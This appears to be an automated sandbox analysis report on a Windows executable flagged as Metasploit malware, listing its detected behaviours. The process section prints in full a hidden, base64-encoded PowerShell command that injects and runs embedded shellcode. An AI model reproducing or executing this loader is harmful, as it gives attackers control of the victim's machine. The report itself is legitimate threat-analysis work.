Analysis Overview
SHA256
ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
Threat Level: Known bad
The file 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-22 21:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-22 21:48
Reported
2024-06-22 21:50
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZA